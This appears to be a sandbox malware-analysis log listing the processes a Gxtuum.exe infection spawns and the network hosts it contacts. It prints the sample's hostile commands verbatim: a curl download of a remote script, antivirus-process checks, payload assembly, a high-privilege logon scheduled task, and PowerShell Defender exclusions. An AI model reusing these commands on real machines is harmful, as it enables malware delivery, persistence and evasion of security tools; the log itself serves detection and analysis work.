C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:4

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE

C:\Users\Admin\AppData\Local\Temp\Files\CONSOL~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\system32\curl.exe

curl -o webpage.py -s https://rentry.co/sntwm349/raw --insecure

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c md 369580

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\findstr.exe

findstr /V "MaskBathroomsCompoundInjection" Participants

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Massachusetts + Radius + Dental + Vendor + Fighting + June + Stockings + Convenience + Falls + Joke + Mask + Severe + Outreach + Sig + Bdsm 369580\Z

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\369580\Origin.pif

369580\Origin.pif 369580\Z

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\timeout.exe

timeout 15

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "SecureHawk" /tr "wscript //B 'C:\Users\Admin\AppData\Local\LinkGuard Dynamics\SecureHawk.js'" /sc onlogon /F /RL HIGHEST

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\System.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\Files\System.exe

C:\Users\Admin\AppData\Local\Temp\Files\System.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe"

C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe

C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe

"C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe"

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 107.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.130.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 ftp.ywxww.net udp
US 8.8.8.8:53 49.130.101.151.in-addr.arpa udp
CN 60.191.208.187:820 ftp.ywxww.net tcp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
HK 103.149.92.191:80 tcp
CN 101.133.156.69:7777 tcp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 137.184.144.245:4782 tcp
N/A 192.168.100.18:4782 tcp
RU 185.215.113.217:80 185.215.113.217 tcp
US 8.8.8.8:53 217.113.215.185.in-addr.arpa udp
IN 122.170.110.131:9105 122.170.110.131 tcp
US 8.8.8.8:53 131.110.170.122.in-addr.arpa udp
US 137.184.144.245:4782 tcp
N/A 192.168.100.18:4782 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 16.113.215.185.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 79.113.190.64.in-addr.arpa udp
US 64.190.113.79:443 tcp
RU 185.215.113.66:80 185.215.113.66 tcp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
RU 83.149.17.194:80 83.149.17.194 tcp
US 8.8.8.8:53 194.17.149.83.in-addr.arpa udp
CN 183.57.21.131:8095 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
RU 185.215.113.66:80 185.215.113.66 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 rl.ammyy.com udp
NL 188.42.129.148:80 rl.ammyy.com tcp
RU 185.215.113.66:80 185.215.113.66 tcp
DE 136.243.104.235:443 tcp
US 64.190.113.79:443 tcp
US 137.184.144.245:4782 tcp
N/A 192.168.100.18:4782 tcp
US 8.8.8.8:53 148.129.42.188.in-addr.arpa udp
US 8.8.8.8:53 235.104.243.136.in-addr.arpa udp
US 8.8.8.8:53 www.ammyy.com udp
DE 136.243.18.118:80 www.ammyy.com tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 118.18.243.136.in-addr.arpa udp
DE 136.243.18.118:443 www.ammyy.com tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 88.221.134.89:80 r11.o.lencr.org tcp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 89.134.221.88.in-addr.arpa udp
RU 185.215.113.66:80 185.215.113.66 tcp
FR 176.150.119.15:56001 tcp
US 64.190.113.79:443 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.179.227:443 gstatic.com tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
RU 185.215.113.84:80 185.215.113.84 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 84.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 safe.ywxww.net udp
RU 185.215.113.17:80 185.215.113.17 tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
US 8.8.8.8:53 17.113.215.185.in-addr.arpa udp
US 64.190.113.79:443 tcp
RU 185.215.113.66:80 185.215.113.66 tcp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 push-hook.cyou udp
US 104.21.10.6:443 push-hook.cyou tcp
US 8.8.8.8:53 processhol.sbs udp
US 64.190.113.79:443 tcp
US 8.8.8.8:53 librari-night.sbs udp
US 8.8.8.8:53 befall-sm0ker.sbs udp
US 8.8.8.8:53 6.10.21.104.in-addr.arpa udp
US 8.8.8.8:53 p10tgrace.sbs udp
US 8.8.8.8:53 peepburry828.sbs udp
US 8.8.8.8:53 owner-vacat10n.sbs udp
US 8.8.8.8:53 3xp3cts1aim.sbs udp
US 8.8.8.8:53 p3ar11fter.sbs udp
US 8.8.8.8:53 steamcommunity.com udp
GB 2.22.99.85:443 steamcommunity.com tcp
RU 185.215.113.66:80 185.215.113.66 tcp
